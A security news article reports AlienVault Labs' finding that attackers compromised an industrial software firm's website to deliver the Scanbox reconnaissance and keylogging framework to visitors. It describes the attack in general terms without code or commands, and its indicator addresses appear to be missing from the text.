Industrial software website used in watering hole attack

AlienVault Labs has discovered a watering hole attack that's using a framework developed for reconnaissance as the primary infection vector.

The criminals responsible for the incident compromised an unnamed industrial software firm's website, suggesting the potential for future attacks against several industries.

The unnamed victim produces software used for simulation and system engineering for a wide range of industries, AlienVault said, including automotive, aerospace, and manufacturing.

The attack starts on the compromised firm's website, where a malicious JavaScript file is loaded from a remote server. Unlike most watering hole incidents, where the visitor is infected with malware, this attack delivers a framework called Scanbox.

Scanbox collects data from the victim and delivers it to the command and control server.

Using plug-ins, the framework has the ability to detect dozens of third-party software installations, including browsers, instant messengers, remote access software, business software, and security software. Finally, keylogging is used to capture data periodically, as well as when information is submitted by the victim to the compromised website.

This isn't the first time such techniques have been seen in the wild. AlienVault noticed this type of reconnaissance in July after observing a number of attackers.

"This is a very powerful framework that gives attackers a lot of insight into the potential targets that will help them launching future attacks against them," commented AienVault's Jaime Blasco.

"We have also seen several Metasploit-produced exploits that target different versions of Java in the same IP address that hosts the Scanbox framework."

For now, AlienVault suggests that administrators watch for traffic from and, as those are indicators of this attack in action.

The IP address that is hosting the command and control server is; it's assigned to a data center in Hong Kong.

Join the newsletter!


Sign up to gain exclusive access to email subscriptions, event invitations, competitions, giveaways, and much more.

Membership is free, and your security and privacy remain protected. View our privacy policy before signing up.

Error: Please check your email address.
Have an opinion on security? Want to have your articles published on CSO? Please contact CSO Content Manager for our guidelines.

Tags softwaredata protectionapplicationsjavascriptAlienVaultwatering hole attacksreconnaissance

More about

Show Comments

Featured Whitepapers

Editor's Recommendations

Solution Centres

Stories by Steve Ragan

Latest Videos

More videos

Blog Posts